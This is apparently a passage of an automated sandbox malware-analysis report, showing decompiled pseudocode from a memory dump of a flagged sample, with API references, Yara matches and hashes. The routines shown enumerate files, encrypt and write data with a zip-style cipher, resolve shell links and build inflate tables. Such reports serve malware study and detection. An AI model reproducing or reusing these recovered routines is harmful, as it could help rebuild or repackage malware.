				 *((intOrPtr*)(_t84 + 4)) = 0;
				 *((intOrPtr*)(_t84 + 8)) = 0;
				_v32 = 7;
				_t60 =  &(_v672.cFileName);
				_v52 = 0;
				_v680 = 1;
				_v36 = 0;
				_t103 = _t60 + 2;
				do {
					_t89 =  *_t60;
					_t60 = _t60 + 2;
				} while (_t89 != 0);
				E29DA41B0( &(_v672.cFileName),  &_v52, _t60 - _t103 >> 1);
				_v8 = 2;
				E29DA6120(_t84,  &_v52);
				_v8 = 1;
				if(_v32 >= 8) {
					_push(_v52);
					E29DADF3B();
					_t116 = _t116 + 4;
				}
				_t104 = _v676;
				while(FindNextFileW(_v676,  &_v672) != 0) {
					_v52 = 0;
					_t71 =  &(_v672.cFileName);
					_v32 = 7;
					_v36 = 0;
					_t105 = _t71 + 2;
					do {
						_t98 =  *_t71;
						_t71 = _t71 + 2;
					} while (_t98 != 0);
					E29DA41B0( &(_v672.cFileName),  &_v52, _t71 - _t105 >> 1);
					_v8 = 3;
					E29DA6120(_t84,  &_v52);
					_v8 = 1;
					if(_v32 >= 8) {
						_push(_v52);
						E29DADF3B();
						_t116 = _t116 + 4;
					}
					_t104 =  &_v672;
				}
				if(_a24 >= 0x10) {
					_push(_a4);
					E29DADF3B();
				}
				 *[fs:0x0] = _v16;
				_pop(_t109);
				_pop(_t113);
				_pop(_t85);
				return E29DADF46(_t84, _t85, _v24 ^ _t114, _t104, _t109, _t113);
			}



































                                        0x29da4c43
                                        0x29da4c45
                                        0x29da4c50
                                        0x29da4c51
                                        0x29da4c57
                                        0x29da4c5c
                                        0x29da4c5e
                                        0x29da4c64
                                        0x29da4c68
                                        0x29da4c6e
                                        0x29da4c72
                                        0x29da4c78
                                        0x29da4c8a
                                        0x29da4c8d
                                        0x29da4c96
                                        0x29da4c98
                                        0x29da4c98
                                        0x29da4cac
                                        0x29da4cb2
                                        0x29da4cb7
                                        0x29da4cb8
                                        0x29da4cbd
                                        0x29da4cbd
                                        0x29da4cc7
                                        0x29da4cca
                                        0x29da4ccd
                                        0x29da4cd1
                                        0x29da4cd3
                                        0x29da4cd6
                                        0x29da4cdb
                                        0x29da4cde
                                        0x29da4ce4
                                        0x29da4ce8
                                        0x29da4cee
                                        0x29da4cf1
                                        0x29da4cf4
                                        0x29da4cf4
                                        0x29da4cf7
                                        0x29da4cfa
                                        0x29da4d0d
                                        0x29da4d15
                                        0x29da4d19
                                        0x29da4d23
                                        0x29da4d2a
                                        0x29da4d2f
                                        0x29da4d30
                                        0x29da4d35
                                        0x29da4d35
                                        0x29da4d38
                                        0x29da4d4e
                                        0x29da4d52
                                        0x29da4d56
                                        0x29da4d5c
                                        0x29da4d63
                                        0x29da4d66
                                        0x29da4d70
                                        0x29da4d70
                                        0x29da4d73
                                        0x29da4d76
                                        0x29da4d89
                                        0x29da4d91
                                        0x29da4d95
                                        0x29da4d9a
                                        0x29da4da1
                                        0x29da4da6
                                        0x29da4da7
                                        0x29da4dac
                                        0x29da4dac
                                        0x29da4db5
                                        0x29da4dc3
                                        0x29da4dcb
                                        0x29da4dd0
                                        0x29da4dd1
                                        0x29da4dd6
                                        0x29da4dde
                                        0x29da4de6
                                        0x29da4de7
                                        0x29da4de8
                                        0x29da4df6

                                        APIs
                                          • Part of subcall function 29DA4990: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,015A2EF8,00000000,00000000,?,?,29D9F7D1,?,?), ref: 29DA49B9
                                          • Part of subcall function 29DA4990: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 29DA49EF
                                        • FindFirstFileW.KERNEL32(00000000,?,?,D9555F04,?,00000000,00000000), ref: 29DA4CA2
                                        • FindNextFileW.KERNEL32(?,?,?), ref: 29DA4D46
                                        • FindNextFileW.KERNEL32(?,?,?), ref: 29DA4DBD
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileFind$ByteCharMultiNextWide$First
                                        • String ID:
                                        • API String ID: 1501163664-0
                                        • Opcode ID: 7d04c1a30265ff7bc1bf9215cdcd15b87f69bc77bde7c6e9a8cde7f9ba0798a0
                                        • Instruction ID: 4fd3162a70d9f18cd12142da5a3952a831da75231a8e17976afd1ab095ab49e3
                                        • Opcode Fuzzy Hash: 7d04c1a30265ff7bc1bf9215cdcd15b87f69bc77bde7c6e9a8cde7f9ba0798a0
                                        • Instruction Fuzzy Hash: BC513B71D10259EBCF14CFA4D884ADEBBB8FF55300F4481AEE809A7240DB74A655DBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DABF80 Relevance: 4.6, APIs: 3, Instructions: 132fileCOMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 88%
                                        			E29DABF80(void* __ecx, signed int _a4, long _a8) {
				signed char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t47;
				intOrPtr _t54;
				signed int _t56;
				void* _t65;
				void* _t74;
				void* _t76;
				signed char _t80;
				signed char _t85;
				unsigned int _t89;
				void* _t94;
				long _t102;
				unsigned int _t107;
				void* _t110;
				void* _t115;

				_push(__ecx);
				_t68 = _a4;
				_t110 = __ecx;
				_t102 = _a8;
				_t47 = _a4;
				if( *((char*)(__ecx + 0x2d)) == 0) {
					L10:
					_t95 =  *((intOrPtr*)(_t110 + 0x20));
					if( *((intOrPtr*)(_t110 + 0x20)) == 0) {
						_t76 =  *(_t110 + 4);
						__eflags = _t76;
						if(_t76 == 0) {
							 *((intOrPtr*)(_t110 + 0x14)) = 0x1000000;
							__eflags = 0;
							return 0;
						} else {
							WriteFile(_t76, _t47, _t102,  &_a8, 0);
							return _a8;
						}
					} else {
						_t77 =  *(_t110 + 0x24);
						if( *(_t110 + 0x24) + _t102 <  *((intOrPtr*)(_t110 + 0x28))) {
							E29DB0010(_t77 + _t95, _t47, _t102);
							_t41 = _t110 + 0x24;
							 *_t41 =  *(_t110 + 0x24) + _t102;
							__eflags =  *_t41;
							return _t102;
						} else {
							 *((intOrPtr*)(_t110 + 0x14)) = 0x30000;
							return 0;
						}
					}
				} else {
					_t54 =  *((intOrPtr*)(__ecx + 0x3c));
					if(_t54 != 0 &&  *((intOrPtr*)(__ecx + 0x40)) < _t102) {
						_push(_t54);
						E29DADF3B();
						_t115 = _t115 + 4;
						 *(_t110 + 0x3c) = 0;
					}
					_t120 =  *(_t110 + 0x3c);
					if( *(_t110 + 0x3c) == 0) {
						_t65 = E29DAE70E(_t68, _t94, _t102, _t110, _t120, _t102 + _t102);
						_t115 = _t115 + 4;
						 *(_t110 + 0x3c) = _t65;
						 *(_t110 + 0x40) = _t102;
					}
					E29DB0010( *(_t110 + 0x3c), _t68, _t102);
					_t115 = _t115 + 0xc;
					_t74 = 0;
					if(_t102 == 0) {
						L9:
						_t47 =  *(_t110 + 0x3c);
						goto L10;
					} else {
						do {
							_t80 =  *((intOrPtr*)(_t74 +  *(_t110 + 0x3c)));
							_t107 =  *(_t110 + 0x30);
							_a4 = _t80;
							_v8 =  *(0x29dcd9b0 + ((_t80 ^ _t107) & 0x000000ff) * 4);
							_t56 =  *(_t110 + 0x38);
							_v8 = _v8 ^ _t107 >> 0x00000008;
							_t85 = _v8;
							 *(_t110 + 0x30) = _t85;
							_t89 = 1 + ((_t85 & 0x000000ff) +  *(_t110 + 0x34)) * 0x8088405;
							 *(_t110 + 0x34) = _t89;
							 *(_t110 + 0x38) = _t56 >> 0x00000008 ^  *(0x29dcd9b0 + ((_t89 >> 0x00000018 ^ _t56) & 0x000000ff) * 4);
							_t74 = _t74 + 1;
							 *(_t74 +  *(_t110 + 0x3c) - 1) = ((_t56 & 0x0000fffd | 0x00000002) ^ 0x00000001) * (_t56 & 0x0000fffd | 0x00000002) >> 0x00000008 ^ _a4;
						} while (_t74 < _a8);
						_t102 = _a8;
						goto L9;
					}
				}
			}





















                                        0x29dabf83
                                        0x29dabf85
                                        0x29dabf89
                                        0x29dabf90
                                        0x29dabf93
                                        0x29dabf95
                                        0x29dac06b
                                        0x29dac06b
                                        0x29dac070
                                        0x29dac0aa
                                        0x29dac0ad
                                        0x29dac0af
                                        0x29dac0cd
                                        0x29dac0d5
                                        0x29dac0db
                                        0x29dac0b1
                                        0x29dac0ba
                                        0x29dac0c9
                                        0x29dac0c9
                                        0x29dac072
                                        0x29dac072
                                        0x29dac07b
                                        0x29dac094
                                        0x29dac09c
                                        0x29dac09c
                                        0x29dac09c
                                        0x29dac0a7
                                        0x29dac07d
                                        0x29dac07e
                                        0x29dac08c
                                        0x29dac08c
                                        0x29dac07b
                                        0x29dabf9b
                                        0x29dabf9b
                                        0x29dabfa0
                                        0x29dabfa7
                                        0x29dabfa8
                                        0x29dabfad
                                        0x29dabfb0
                                        0x29dabfb0
                                        0x29dabfb7
                                        0x29dabfbb
                                        0x29dabfc1
                                        0x29dabfc6
                                        0x29dabfc9
                                        0x29dabfcc
                                        0x29dabfcc
                                        0x29dabfd5
                                        0x29dabfda
                                        0x29dabfdd
                                        0x29dabfe1
                                        0x29dac068
                                        0x29dac068
                                        0x00000000
                                        0x29dabfe7
                                        0x29dabfe7
                                        0x29dabfea
                                        0x29dabfed
                                        0x29dabff0
                                        0x29dac005
                                        0x29dac008
                                        0x29dac00e
                                        0x29dac011
                                        0x29dac014
                                        0x29dac025
                                        0x29dac026
                                        0x29dac044
                                        0x29dac05b
                                        0x29dac05c
                                        0x29dac060
                                        0x29dac065
                                        0x00000000
                                        0x29dac065
                                        0x29dabfe1

                                        APIs
                                        • _memmove.LIBCMT ref: 29DABFD5
                                        • _memmove.LIBCMT ref: 29DAC094
                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000,00140B17,?,?,?,?,29DAB085,?,00000001,?,?,29DACBC1), ref: 29DAC0BA
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _memmove$FileWrite
                                        • String ID:
                                        • API String ID: 726942401-0
                                        • Opcode ID: de39b1eeb925ff8b991cfd4d5d588eea5ce4fb878d20f0c91079387b15d763ff
                                        • Instruction ID: 1e86329156ed4265d81e5ca5cc8cacdab4f1f65e4a143206df25dcf8c53b0577
                                        • Opcode Fuzzy Hash: de39b1eeb925ff8b991cfd4d5d588eea5ce4fb878d20f0c91079387b15d763ff
                                        • Instruction Fuzzy Hash: 334100726007049FC768DF29D980A67F7E8FF94320F50892EE98687E00D235F515CB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D8FA90 Relevance: 4.6, APIs: 3, Instructions: 94comstringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 33%
                                        			E29D8FA90(intOrPtr __ebx, char* __edi) {
				signed int _v8;
				char _v276;
				char _v540;
				short _v1060;
				char _v1380;
				int _v1384;
				int _v1388;
				void* __esi;
				signed int _t22;
				intOrPtr* _t28;
				int _t32;
				intOrPtr* _t34;
				intOrPtr* _t36;
				int _t38;
				intOrPtr _t47;
				void* _t53;
				intOrPtr _t56;
				signed int _t57;

				_t55 = __edi;
				_t41 = __ebx;
				_t22 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t22 ^ _t57;
				_v1384 = 0;
				 *((char*)(__ebx)) = 0;
				_t56 =  *0x29dd83d8(0x29dc5218, 0, 1, 0x29dc5208,  &_v1384);
				if(_t56 < 0) {
					L6:
					_t26 = _t56;
				} else {
					_t28 = _v1384;
					_v1388 = 0;
					 *((intOrPtr*)( *((intOrPtr*)( *_t28))))(_t28, 0x29dc5228,  &_v1388);
					MultiByteToWideChar(0, 0, __edi, 0xffffffff,  &_v1060, 0x104);
					_t32 = _v1388;
					_t53 =  *_t32;
					_t51 =  *((intOrPtr*)(_t53 + 0x14));
					_t56 =  *((intOrPtr*)( *((intOrPtr*)(_t53 + 0x14))))(_t32,  &_v1060, 0);
					if(_t56 < 0) {
						goto L6;
					} else {
						_t34 = _v1384;
						_t47 =  *_t34;
						_t51 =  *((intOrPtr*)(_t47 + 0x4c));
						_t56 =  *((intOrPtr*)( *((intOrPtr*)(_t47 + 0x4c))))(_t34, 0, 1);
						if(_t56 < 0) {
							goto L6;
						} else {
							_t36 = _v1384;
							_push(4);
							_push( &_v1380);
							_push(0x104);
							_t51 =  &_v276;
							_push( &_v276);
							_push(_t36);
							if( *((intOrPtr*)( *((intOrPtr*)( *_t36 + 0xc))))() >= 0) {
								_t38 = _v1384;
								_t51 =  &_v540;
								_t56 =  *((intOrPtr*)( *((intOrPtr*)( *_t38 + 0x18))))(_t38,  &_v540, 0x104);
								if(_t56 >= 0) {
									 *0x29dd8498(__ebx,  &_v276, 0x104);
									goto L6;
								}
							}
						}
					}
				}
				return E29DADF46(_t26, _t41, _v8 ^ _t57, _t51, _t55, _t56);
			}





















                                        0x29d8fa90
                                        0x29d8fa90
                                        0x29d8fa99
                                        0x29d8faa0
                                        0x29d8fab9
                                        0x29d8fac3
                                        0x29d8facc
                                        0x29d8fad0
                                        0x29d8fba1
                                        0x29d8fba1
                                        0x29d8fad6
                                        0x29d8fad6
                                        0x29d8fae3
                                        0x29d8faf7
                                        0x29d8fb0c
                                        0x29d8fb12
                                        0x29d8fb18
                                        0x29d8fb1a
                                        0x29d8fb29
                                        0x29d8fb2d
                                        0x00000000
                                        0x29d8fb2f
                                        0x29d8fb2f
                                        0x29d8fb35
                                        0x29d8fb37
                                        0x29d8fb41
                                        0x29d8fb45
                                        0x00000000
                                        0x29d8fb47
                                        0x29d8fb47
                                        0x29d8fb4f
                                        0x29d8fb57
                                        0x29d8fb58
                                        0x29d8fb5d
                                        0x29d8fb63
                                        0x29d8fb64
                                        0x29d8fb6c
                                        0x29d8fb6e
                                        0x29d8fb7b
                                        0x29d8fb88
                                        0x29d8fb8c
                                        0x29d8fb9b
                                        0x00000000
                                        0x29d8fb9b
                                        0x29d8fb8c
                                        0x29d8fb6c
                                        0x29d8fb45
                                        0x29d8fb2d
                                        0x29d8fbb1

                                        APIs
                                        • CoCreateInstance.OLE32(29DC5218,00000000,00000001,29DC5208,?), ref: 29D8FAC6
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 29D8FB0C
                                        • lstrcpyn.KERNEL32(?,?,00000104,?,000000FF,?,00000104), ref: 29D8FB9B
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                        • String ID:
                                        • API String ID: 1940255200-0
                                        • Opcode ID: 2e3aae5e77dcb606c1c8b93e9a36a1729f5f076bf7778e398bcf6a7b9057d57f
                                        • Instruction ID: 6d5e14300d9b2d0995ba1f699724cdb02ad4515a39a7e52db67f660ef5d501fa
                                        • Opcode Fuzzy Hash: 2e3aae5e77dcb606c1c8b93e9a36a1729f5f076bf7778e398bcf6a7b9057d57f
                                        • Instruction Fuzzy Hash: 7A315471A41714AFD710DB58CC91FAA77B8EF88711F4042D8F618EB290DAB1AD46CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DB77BA Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E29DB77BA() {

				SetUnhandledExceptionFilter(E29DB7778);
				return 0;
			}



                                        0x29db77bf
                                        0x29db77c7

                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00037778), ref: 29DB77BF
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: 1d1a13af8d155388c8fd7bf4f66555938eec3003646aefc9f62cd91372e47641
                                        • Instruction ID: 330f2c88648578a1bba42e65ba60f59cbf3aadab52c9841cffe8e8b1e7afeb80
                                        • Opcode Fuzzy Hash: 1d1a13af8d155388c8fd7bf4f66555938eec3003646aefc9f62cd91372e47641
                                        • Instruction Fuzzy Hash: 639002A51550414746016774996C50525D06A891867D18494E083D8808DA9440157591
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D8B1E0 Relevance: .4, Instructions: 370COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 78%
                                        			E29D8B1E0(signed int* __ecx, signed int* __edx, signed int _a4, signed char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20, signed int* _a24, intOrPtr _a28, signed int* _a32) {
				signed int _v8;
				unsigned int _v16;
				unsigned int _v20;
				unsigned int _v24;
				unsigned int _v28;
				unsigned int _v32;
				unsigned int _v36;
				unsigned int _v40;
				unsigned int _v44;
				unsigned int _v48;
				unsigned int _v52;
				unsigned int _v56;
				unsigned int _v60;
				unsigned int _v64;
				unsigned int _v68;
				unsigned int _v72;
				unsigned int _v76;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				signed int _v156;
				signed int* _v160;
				intOrPtr _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				unsigned int _v180;
				signed int _v184;
				signed int _v188;
				char _v191;
				signed char _v192;
				signed int _v196;
				signed int* _v200;
				signed int* _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				signed int _v216;
				signed int* _v220;
				signed int* _v224;
				signed int _v284;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t205;
				signed int _t209;
				signed int _t214;
				intOrPtr* _t215;
				signed int** _t217;
				signed int* _t218;
				void* _t221;
				signed int _t223;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t229;
				signed int _t231;
				signed int* _t233;
				signed int _t235;
				signed int _t238;
				void* _t239;
				void* _t240;
				intOrPtr* _t243;
				signed int _t246;
				signed int* _t248;
				signed int _t250;
				signed int _t251;
				intOrPtr _t252;
				intOrPtr _t256;
				signed int _t257;
				signed int _t261;
				intOrPtr _t266;
				signed char _t276;
				intOrPtr _t280;
				signed char* _t283;
				signed int _t288;
				intOrPtr _t289;
				signed int _t290;
				signed char _t295;
				signed int _t313;
				signed int* _t318;
				signed int _t320;
				signed int _t321;
				intOrPtr _t322;
				signed int* _t326;
				void* _t329;
				signed int _t330;
				void* _t332;
				signed int* _t333;
				unsigned int _t334;
				signed int _t338;
				signed int _t340;

				_t248 = __ecx;
				_t205 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t205 ^ _t340;
				_t243 = _a20;
				_v208 = _a28;
				_t330 = _a4;
				_v200 = _a32;
				_t209 = 0;
				_t318 = _a24;
				_v160 = __ecx;
				_v184 = _t330;
				_v220 = _t243;
				_v204 = __edx;
				_v76 = 0;
				_v72 = 0;
				_v68 = 0;
				_v64 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				do {
					_t288 =  *_t248;
					 *((intOrPtr*)(_t340 + _t288 * 4 - 0x48)) =  *((intOrPtr*)(_t340 + _t288 * 4 - 0x48)) + 1;
					_t289 = _t340 + _t288 * 4 - 0x48;
					_t248 =  &(_t248[1]);
					_t330 = _t330 - 1;
				} while (_t330 != 0);
				if(_v76 != _v184) {
					_t290 =  *_t318;
					_v144 = _t290;
					_t250 = 1;
					while( *((intOrPtr*)(_t340 + _t250 * 4 - 0x48)) == _t209) {
						_t250 = _t250 + 1;
						if(_t250 <= 0xf) {
							continue;
						}
						break;
					}
					_v148 = _t250;
					if(_t290 < _t250) {
						_v144 = _t250;
						_t290 = _t250;
					}
					_t331 = 0xf;
					while( *((intOrPtr*)(_t340 + _t331 * 4 - 0x48)) == _t209) {
						_t331 = _t331 - 1;
						if(_t331 != 0) {
							continue;
						}
						break;
					}
					_v172 = _t331;
					if(_t290 > _t331) {
						_v144 = _t331;
						_t290 = _t331;
					}
					 *_t318 = _t290;
					_t320 = 1 << _t250;
					if(_t250 >= _t331) {
						L18:
						_t251 = _t331 * 4;
						_t243 = _t340 + _t251 - 0x48;
						_v168 = _t251;
						_t252 =  *_t243;
						_t321 = _t320 - _t252;
						_v216 = _t321;
						if(_t321 < 0) {
							goto L28;
						} else {
							 *_t243 = _t252 + _t321;
							_t256 = 0;
							_t332 = _t331 - 1;
							_v136 = _t209;
							if(_t332 != 0) {
								_t329 = 0;
								do {
									_t256 = _t256 +  *((intOrPtr*)(_t340 + _t329 - 0x44));
									_t329 = _t329 + 4;
									_t332 = _t332 - 1;
									 *((intOrPtr*)(_t340 + _t329 - 0x84)) = _t256;
								} while (_t332 != 0);
							}
							_t333 = _v160;
							_t322 = 0;
							do {
								_t257 =  *_t333;
								_t333 =  &(_t333[1]);
								_v152 = _t333;
								if(_t257 != _t209) {
									_t338 =  *(_t340 + _t257 * 4 - 0x88);
									 *((intOrPtr*)(_v200 + _t338 * 4)) = _t322;
									 *(_t340 + _t257 * 4 - 0x88) = _t338 + 1;
									_t333 = _v152;
								}
								_t322 = _t322 + 1;
							} while (_t322 < _v184);
							_v184 =  *((intOrPtr*)(_t340 + _v168 - 0x88));
							_v152 = _v200;
							_t261 = _v148;
							_t321 = 0;
							_t246 =  ~_t290;
							_v180 = 0;
							_v140 = _t209;
							_v156 = 0xffffffff;
							_v284 = _t209;
							_v160 = _t209;
							_v168 = _t209;
							if(_t261 > _v172) {
								L70:
								if(_v216 != _t209 && _v172 != 1) {
									_t209 = 0xfffffffb;
								}
								return E29DADF46(_t209, _t246, _v8 ^ _t340, _t290, _t321, _t333);
							} else {
								_t331 = _v188;
								_v176 = _t340 + _t261 * 4 - 0x48;
								while(1) {
									_t266 =  *_v176;
									_v164 = _t266;
									if(_t266 == _t209) {
										goto L68;
									}
									do {
										_v164 = _v164 - 1;
										_t215 = _t246 + _t290;
										if(_v148 <= _t215) {
											L50:
											_v191 = _v148 - _t246;
											_t217 = _v152;
											if(_t217 < _v200 + _v184 * 4) {
												_t218 =  *_t217;
												_t295 = _a8;
												if(_t218 >= _t295) {
													_t221 = _t218 - _t295 + _t218 - _t295 + _t218 - _t295 + _t218 - _t295;
													_v192 =  *((intOrPtr*)(_t221 + _a16)) + 0x50;
													_t331 =  *(_t221 + _a12);
												} else {
													asm("sbb dl, dl");
													_v192 = (_t295 & 0x000000a0) + 0x60;
													_t333 = _t218;
												}
												_v152 =  &(_v152[1]);
											} else {
												_v192 = 0xc0;
											}
											_t223 = _t321 >> _t246;
											if(_t223 < _v168) {
												_t283 = _v160 + _t223 * 8;
												do {
													 *_t283 = _v192;
													_t283[4] = _t333;
													_t223 = _t223 + 1;
													_t283 =  &(_t283[8]);
												} while (_t223 < _v168);
												_t321 = _v180;
											}
											_t225 = 1 << _v148 - 1;
											if((_t321 & 0x00000001) != 0) {
												do {
													_t321 = _t321 ^ _t225;
													_t225 = _t225 >> 1;
												} while ((_t321 & _t225) != 0);
											}
											_t321 = _t321 ^ _t225;
											_t226 = _v156;
											_v180 = _t321;
											if(((0x00000001 << _t246) - 0x00000001 & _t321) !=  *((intOrPtr*)(_t340 + _t226 * 4 - 0x88))) {
												do {
													_t246 = _t246 - _v144;
													_t226 = _t226 - 1;
												} while (((0x00000001 << _t246) - 0x00000001 & _t321) !=  *((intOrPtr*)(_t340 + _t226 * 4 - 0x88)));
												_v156 = _t226;
											}
											goto L67;
										} else {
											_v212 = _v164 + 1;
											_v196 = _t246 - _t290;
											while(1) {
												_v196 = _v196 + _t290;
												_v156 = _v156 + 1;
												_t243 = _t215;
												_t227 = _v144;
												_t313 = _v172 - _t243;
												if(_t313 > _t227) {
													_t313 = _t227;
												}
												_t276 = _v148 - _t243;
												_t229 = 1 << _t276;
												if(1 > _v212) {
												}
												L38:
												_t239 = _t229 + (_t321 | 0xffffffff) - _v164;
												_t321 = _v176;
												if(_t276 < _t313) {
													_t276 = _t276 + 1;
													if(_t276 < _t313) {
														while(1) {
															_t326 = _t321 + 4;
															_v160 = _t326;
															_t321 =  *_t326;
															_t240 = _t239 + _t239;
															if(_t240 <= _t321) {
																goto L44;
															}
															_t276 = _t276 + 1;
															_t239 = _t240 - _t321;
															if(_t276 < _t313) {
																_t321 = _v160;
																continue;
															}
															goto L44;
														}
													}
												}
												L44:
												_t231 =  *_v204;
												_v168 = 1;
												_t290 = (1 << _t276) + _t231;
												if(1 > 0x5a0) {
													goto L28;
												} else {
													_t321 = _v208 + _t231 * 8;
													_t233 = _t340 + _v156 * 4 - 0x118;
													_v224 = _t233;
													 *_t233 = _t321;
													 *_v204 = _t290;
													_t235 = _v156;
													_v160 = _t321;
													if(_t235 == 0) {
														 *_v220 = _t321;
													} else {
														_t334 = _v180;
														 *(_t340 + _t235 * 4 - 0x88) = _t334;
														_v192 = _t276;
														_t238 = _t334 >> _v196;
														_t280 =  *((intOrPtr*)(_v224 - 4));
														_v191 = _v144;
														_t331 = (_t321 - _t280 >> 3) - _t238;
														 *(_t280 + _t238 * 8) = _v192;
														 *(_t280 + 4 + _t238 * 8) = (_t321 - _t280 >> 3) - _t238;
													}
													_t215 = _t243 + _v144;
													if(_v148 > _t215) {
														_t290 = _v144;
														_v196 = _v196 + _t290;
														_v156 = _v156 + 1;
														_t243 = _t215;
														_t227 = _v144;
														_t313 = _v172 - _t243;
														if(_t313 > _t227) {
															_t313 = _t227;
														}
														_t276 = _v148 - _t243;
														_t229 = 1 << _t276;
														if(1 > _v212) {
														}
														goto L44;
													} else {
														_t321 = _v180;
														goto L50;
													}
												}
												goto L74;
											}
										}
										goto L74;
										L67:
										_t290 = _v144;
									} while (_v164 != 0);
									L68:
									_v176 = _v176 + 4;
									_t214 = _v148 + 1;
									_v148 = _t214;
									if(_t214 <= _v172) {
										_t209 = 0;
										continue;
									} else {
										_t209 = 0;
										goto L70;
									}
									goto L74;
								}
							}
						}
					} else {
						while(1) {
							_t321 = _t320 -  *((intOrPtr*)(_t340 + _t250 * 4 - 0x48));
							if(_t321 < 0) {
								break;
							}
							_t250 = _t250 + 1;
							_t320 = _t321 + _t321;
							if(_t250 < _t331) {
								continue;
							} else {
								goto L18;
							}
							goto L74;
						}
						L28:
						return E29DADF46(0xfffffffd, _t243, _v8 ^ _t340, _t290, _t321, _t331);
					}
				} else {
					 *_t243 = 0;
					 *_t318 = 0;
					return E29DADF46(0, _t243, _v8 ^ _t340, _t289, _t318, _t330);
				}
				L74:
			}
































































































                                        0x29d8b1e0
                                        0x29d8b1e9
                                        0x29d8b1f0
                                        0x29d8b1f7
                                        0x29d8b1fa
                                        0x29d8b204
                                        0x29d8b207
                                        0x29d8b20d
                                        0x29d8b210
                                        0x29d8b213
                                        0x29d8b219
                                        0x29d8b21f
                                        0x29d8b225
                                        0x29d8b22b
                                        0x29d8b22e
                                        0x29d8b231
                                        0x29d8b234
                                        0x29d8b237
                                        0x29d8b23a
                                        0x29d8b23d
                                        0x29d8b240
                                        0x29d8b243
                                        0x29d8b246
                                        0x29d8b249
                                        0x29d8b24c
                                        0x29d8b24f
                                        0x29d8b252
                                        0x29d8b255
                                        0x29d8b258
                                        0x29d8b260
                                        0x29d8b260
                                        0x29d8b262
                                        0x29d8b266
                                        0x29d8b26a
                                        0x29d8b26d
                                        0x29d8b26d
                                        0x29d8b279
                                        0x29d8b292
                                        0x29d8b294
                                        0x29d8b29a
                                        0x29d8b2a0
                                        0x29d8b2a6
                                        0x29d8b2aa
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8b2aa
                                        0x29d8b2ac
                                        0x29d8b2b4
                                        0x29d8b2b6
                                        0x29d8b2bc
                                        0x29d8b2bc
                                        0x29d8b2be
                                        0x29d8b2c3
                                        0x29d8b2c9
                                        0x29d8b2ca
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8b2ca
                                        0x29d8b2cc
                                        0x29d8b2d4
                                        0x29d8b2d6
                                        0x29d8b2dc
                                        0x29d8b2dc
                                        0x29d8b2de
                                        0x29d8b2e5
                                        0x29d8b2e9
                                        0x29d8b301
                                        0x29d8b301
                                        0x29d8b308
                                        0x29d8b30c
                                        0x29d8b312
                                        0x29d8b314
                                        0x29d8b316
                                        0x29d8b31c
                                        0x00000000
                                        0x29d8b322
                                        0x29d8b324
                                        0x29d8b326
                                        0x29d8b328
                                        0x29d8b329
                                        0x29d8b32f
                                        0x29d8b331
                                        0x29d8b333
                                        0x29d8b333
                                        0x29d8b337
                                        0x29d8b33a
                                        0x29d8b33b
                                        0x29d8b33b
                                        0x29d8b333
                                        0x29d8b344
                                        0x29d8b34a
                                        0x29d8b350
                                        0x29d8b350
                                        0x29d8b352
                                        0x29d8b355
                                        0x29d8b35d
                                        0x29d8b35f
                                        0x29d8b373
                                        0x29d8b377
                                        0x29d8b379
                                        0x29d8b379
                                        0x29d8b37f
                                        0x29d8b380
                                        0x29d8b395
                                        0x29d8b3a1
                                        0x29d8b3a7
                                        0x29d8b3af
                                        0x29d8b3b1
                                        0x29d8b3b3
